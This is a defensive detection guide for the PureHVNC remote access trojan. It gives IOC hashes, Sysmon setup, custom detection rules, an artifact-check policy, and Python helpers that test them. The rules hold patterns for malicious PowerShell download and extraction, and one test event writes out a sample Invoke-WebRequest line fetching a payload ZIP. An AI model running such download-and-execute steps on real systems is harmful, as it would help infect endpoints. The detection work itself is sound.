PureHVNC is a covert Remote Access Trojan (RAT) that allows attackers to control Windows endpoints without user detection. The HVNC in PureHVNC stands for “Hidden Virtual Network Computing”. Typically delivered through phishing emails with malicious attachments, it activates upon execution. The malware downloads and opens a decoy PDF, retrieves two ZIP files (DXJS.zip and FTSP.zip) via PowerShell, and extracts their contents into hidden folders within the user’s Downloads directory. It then runs multiple Python scripts (such as money.py, update.py, and others) from the extracted files and reopens the decoy PDF to sustain the ruse. Additionally, PureHVNC establishes communication with a command-and-control (C2) server, enabling attackers to execute remote commands on the infected system.
ANALYZED IOC
Type | Value
Hash (SHA256) | 441c4502584240624f4af6d67eded476c781ff0b72afe95ea236cc87a50e5650
MD5 | 372d3835bc694a7d9934727030bf7be6
REQUIREMENTS
- Argus server or Argus manager
- A Windows victim endpoint with the Argus agent installed
DETECTION WITH ARGUS
Argus capabilities to detect PureHVNC malware on an infected Windows endpoint:
• Using custom detection rules to detect PureHVNC malware activities.
• Using the Argus Security Configuration Assessment (SCA) module to check for the presence of PureHVNC malware artifacts.
DETECTION CRITERIA
- Use Sysmon to monitor process-creation and related system events on the Windows endpoint.
- Create rules on the Argus server to detect the malicious activities of PureHVNC malware.
Windows endpoint
Steps to configure Sysmon on the endpoint and forward the logs from the Sysmon event channel to the Argus server for analysis:
- Download Sysmon from https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
- Extract the Sysmon archive to a location of your choice.
- Using PowerShell, download the Sysmon configuration file sysmonconfig.xml. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable:
wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml
- Switch to the directory with the Sysmon executable. Run the command below to install and start Sysmon using PowerShell with Administrator privileges:
.\Sysmon64.exe -accepteula -i sysmonconfig.xml
- Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Argus server:
<localfile>
<location>Microsoft-Windows-Sysmon/Operational</location>
<log_format>eventchannel</log_format>
</localfile>
- Restart the Argus agent
Restart-Service -Name wazuh
Argus server
Create rules to detect the PureHVNC malware behavior on the endpoint:
- Create a file purehvnc_malware.xml in the /var/ossec/etc/rules/ directory
$ nano /var/ossec/etc/rules/purehvnc_malware.xml
- Add the rules to the /var/ossec/etc/rules/purehvnc_malware.xml file:
<group name="purehvnc,malware,">
  <rule id="100201" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)timeout\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\/t 5</field>
    <field name="win.eventdata.CommandLine" type="pcre2">REM\sWait\sfor\sPDF\sto\sopen</field>
    <description>Possible PureHVNC malware activity: PDF delayed execution with timeout.exe.</description>
    <mitre>
      <id>T1059</id>
    </mitre>
  </rule>
  <rule id="100202" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.ServicePointManager</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.SecurityProtocolType</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Invoke-WebRequest\s-Uri</field>
    <field name="win.eventdata.CommandLine" type="pcre2">DXJS.zip</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip downloaded from a remote file share.</description>
    <mitre>
      <id>T1105</id>
    </mitre>
  </rule>
  <rule id="100203" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Expand-Archive</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-DestinationPath</field>
    <field name="win.eventdata.CommandLine" type="pcre2">DXJS.zip</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-Force</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip extracted.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>
  <rule id="100204" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)attrib\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\+h</field>
    <description>Possible PureHVNC malware activity: Suspicious folder hiding activity.</description>
    <mitre>
      <id>T1564.001</id>
    </mitre>
  </rule>
  <rule id="100205" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)AppInstallerPythonRedirector\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">python\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">(?i)(money|update|upload|time|kam|moment|info)\.py</field>
    <description>Possible PureHVNC malware activity: Suspicious Python script executed.</description>
    <mitre>
      <id>T1059.006</id>
    </mitre>
  </rule>
  <rule id="100206" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.ServicePointManager</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.SecurityProtocolType</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Invoke-WebRequest\s-Uri</field>
    <field name="win.eventdata.CommandLine" type="pcre2">FTSP.zip</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip downloaded from a remote file share.</description>
    <mitre>
      <id>T1105</id>
    </mitre>
  </rule>
  <rule id="100207" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Expand-Archive</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-DestinationPath</field>
    <field name="win.eventdata.CommandLine" type="pcre2">FTSP.zip</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-Force</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip extracted.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>
</group>
- Restart the Argus manager
systemctl restart wazuh-manager
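Before relying on the rules above, it helps to replay their pcre2 field patterns over a few process-creation records and confirm that each rule fires only on the activity it is meant to catch. The script below is an added example, not part of the original page or of Argus/Wazuh: it carries the seven rules' patterns, AND-matches them the way multiple <field> elements in one rule are matched, and runs them over constructed Sysmon Event ID 1 records (the process images, command lines and the example.invalid host are assumptions, not captured telemetry).

```python
import re

# Rules 100201-100207 from the rule file above, reduced to their pcre2 field
# patterns. Inside one rule every <field> must match (they are AND'ed), and
# pcre2 fields are searched, not anchored, so re.search() mirrors the matcher.
RULES = {
    100201: {"Image": [r"(?i)timeout\.exe"],
             "CommandLine": [r"\/t 5", r"REM\sWait\sfor\sPDF\sto\sopen"]},
    100202: {"Image": [r"(?i)powershell\.exe"],
             "CommandLine": [r"Net.ServicePointManager", r"Net.SecurityProtocolType",
                             r"Invoke-WebRequest\s-Uri", r"DXJS.zip"]},
    100203: {"Image": [r"(?i)powershell\.exe"],
             "CommandLine": [r"Expand-Archive", r"\-DestinationPath", r"DXJS.zip", r"\-Force"]},
    100204: {"Image": [r"(?i)attrib\.exe"], "CommandLine": [r"\+h"]},
    100205: {"Image": [r"(?i)AppInstallerPythonRedirector\.exe"],
             "CommandLine": [r"python\.exe",
                             r"(?i)(money|update|upload|time|kam|moment|info)\.py"]},
    100206: {"Image": [r"(?i)powershell\.exe"],
             "CommandLine": [r"Net.ServicePointManager", r"Net.SecurityProtocolType",
                             r"Invoke-WebRequest\s-Uri", r"FTSP.zip"]},
    100207: {"Image": [r"(?i)powershell\.exe"],
             "CommandLine": [r"Expand-Archive", r"\-DestinationPath", r"FTSP.zip", r"\-Force"]},
}

def matching_rules(eventdata):
    """Return the ids of rules whose every field pattern matches one Sysmon
    Event ID 1 record (the win.eventdata part of a rule 61603 alert)."""
    return [rule_id for rule_id, fields in RULES.items()
            if all(re.search(pattern, eventdata.get(name, ""))
                   for name, patterns in fields.items() for pattern in patterns)]

# Constructed Sysmon process-creation records (assumptions, not real telemetry).
# The last one is a benign Expand-Archive that must not fire: the ZIP name
# differs from the malware's, so rules 100203/100207 stay silent.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\timeout.exe",
     "CommandLine": "timeout /t 5 REM Wait for PDF to open"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c [Net.ServicePointManager]::SecurityProtocol = "
                    "[Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "
                    "https://example.invalid/DXJS.zip -OutFile DXJS.zip"},
    {"Image": r"C:\Windows\System32\attrib.exe",
     "CommandLine": r"attrib +h C:\Users\alice\Downloads\Python"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"Expand-Archive -Path tools.zip -DestinationPath C:\tools -Force"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["CommandLine"][:40], "->", matching_rules(event))
```

Running it shows each constructed record firing exactly one rule (100201, 100202, 100204) and the benign extraction firing none, which is the behaviour to expect from the Argus server once the rule file is loaded.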
Detection results
- Navigate to Threat Hunting > Events
- Click on Add filter
- In the Field box, select rule.id
- In the Operator box, select is one of, and enter 100201,100202,100203,100204,100205,100206,100207 in the Values field
- Click on Save
Security configuration assessment (SCA)
The Argus SCA module assesses system configurations by comparing them to a predefined set of rules and benchmarks. It conducts checks to verify system hardening, identify vulnerable software, and ensure configuration policies are properly applied on monitored endpoints. By leveraging the SCA module, organizations can strengthen their security posture, maintain compliance with industry standards, and minimize the risk of security breaches.
Windows endpoint
We configure the Argus SCA module to check for the presence of PureHVNC malware artifacts on the Windows endpoint.
- Launch PowerShell with administrative privilege and create a folder to store custom SCA policy files:
> New-Item -Path "C:\Program Files (x86)\" -Name "sca_policies" -ItemType Directory
- Create a file purehvnc_malware_check.yml in the C:\Program Files (x86)\sca_policies folder:
> New-Item -Path 'C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml' -ItemType File
- Add the following content to the C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml file. Replace <USERNAME> with the name of the user profile to be checked:
# Security Configuration Assessment
# Audit for PureHVNC malware
# Copyright (C) 2024, Wazuh Inc.
#
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License (version 2) as published by the FSF - Free Software
# Foundation

policy:
  id: "PureHVNC_malware"
  file: "purehvnc_malware_check.yml"
  name: "PureHVNC malware Windows OS check"
  description: "Detecting PureHVNC malware"

requirements:
  title: "Checking PureHVNC malware on Windows based systems"
  description: "Requirements for running the audit policy under a Windows platform"
  condition: all
  rules:
    - 'r:HKEY_LOCAL_MACHINE\SAM\SAM'

checks:
  - id: 77000
    title: "Checking for Possible PureHVNC malware artifacts (ZIP files) in Downloads folder"
    description: "Check for ZIP files associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the files DXJS.zip and FTSP.zip from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\DXJS.zip'
      - 'not f:C:\Users\<USERNAME>\Downloads\FTSP.zip'

  - id: 77001
    title: "Checking for Possible PureHVNC malware artifacts (Python scripts) in Downloads folder"
    description: "Check for Python scripts associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the Python scripts and the Python folder from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\money.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\update.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\upload.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\time.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\kam.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\moment.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\info.py'

  - id: 77002
    title: "Checking for Possible PureHVNC malware artifacts (batch file) in Downloads folder"
    description: "Check for batch file associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the startuppp.bat file from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\startuppp.bat'

  - id: 77003
    title: "Checking for Possible PureHVNC malware artifacts (folders) in Downloads folder"
    description: "Check for folders associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the Python and Print folders from the Downloads folder."
    condition: all
    rules:
      - 'not d:C:\Users\<USERNAME>\Downloads\Python'
      - 'not d:C:\Users\<USERNAME>\Downloads\Print'
- Edit the Argus agent C:\Program Files (x86)\ossec-agent\ossec.conf file and include the following configuration within the <sca> block:
<policies>
<policy>C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml</policy>
</policies>
- Restart the Argus agent
> Restart-Service -Name WazuhSvc
Monitoring the Alerts
Navigate to the Configuration Assessment page on the Argus dashboard. Select the monitored Windows endpoint, then select PureHVNC malware Windows OS check to view the scan results.
A Failed result indicates that the PureHVNC malware artifacts were detected on the endpoint. Conversely, a Passed result indicates that the PureHVNC malware artifacts were not detected and that the endpoint meets the SCA policy criteria.
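The pass/fail logic described above, as an added Python example that is not Argus/Wazuh code: it carries the four checks of purehvnc_malware_check.yml, evaluates each "not f:" / "not d:" rule under condition: all, and runs them against a temporary directory that stands in for C:\Users\<USERNAME>, with one constructed artifact planted to show that a single hit is enough to fail a check.

```python
import os
import tempfile

PROFILE = r"C:\Users\<USERNAME>"          # placeholder exactly as in the policy
PY_DIR = PROFILE + r"\Downloads\Python\Python312"

# The four checks of purehvnc_malware_check.yml. A rule "not f:<path>" holds
# when the file is absent, "not d:<path>" when the directory is absent, and
# condition: all means a check passes only if every one of its rules holds.
CHECKS = {
    77000: ["not f:" + PROFILE + r"\Downloads\DXJS.zip",
            "not f:" + PROFILE + r"\Downloads\FTSP.zip"],
    77001: ["not f:" + PY_DIR + "\\" + name + ".py"
            for name in ("money", "update", "upload", "time", "kam", "moment", "info")],
    77002: ["not f:" + PROFILE + r"\Downloads\startuppp.bat"],
    77003: ["not d:" + PROFILE + r"\Downloads\Python",
            "not d:" + PROFILE + r"\Downloads\Print"],
}

def rule_holds(rule, profile_dir):
    """Evaluate one f:/d: rule, with profile_dir standing in for the <USERNAME> profile."""
    negated = rule.startswith("not ")
    kind, _, path = (rule[4:] if negated else rule).partition(":")
    # strip the Windows profile prefix and map the remainder onto profile_dir
    relative = path[len(PROFILE):].lstrip("\\").replace("\\", os.sep)
    target = os.path.join(profile_dir, relative)
    exists = os.path.isfile(target) if kind == "f" else os.path.isdir(target)
    return exists != negated

def run_policy(profile_dir):
    """Return {check_id: "passed" | "failed"} as the Configuration Assessment page reports it."""
    return {cid: "passed" if all(rule_holds(r, profile_dir) for r in rules) else "failed"
            for cid, rules in CHECKS.items()}

def demo():
    """Constructed profile (assumption): only DXJS.zip and an empty Python312 folder exist."""
    with tempfile.TemporaryDirectory() as profile:
        os.makedirs(os.path.join(profile, "Downloads", "Python", "Python312"))
        open(os.path.join(profile, "Downloads", "DXJS.zip"), "w").close()
        return run_policy(profile)

if __name__ == "__main__":
    print(demo())   # 77000 and 77003 fail: one artifact is enough to fail a check
```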
Conclusion
This use case demonstrates how to detect PureHVNC malware and its malicious activities using Argus detection rules together with the Argus SCA module.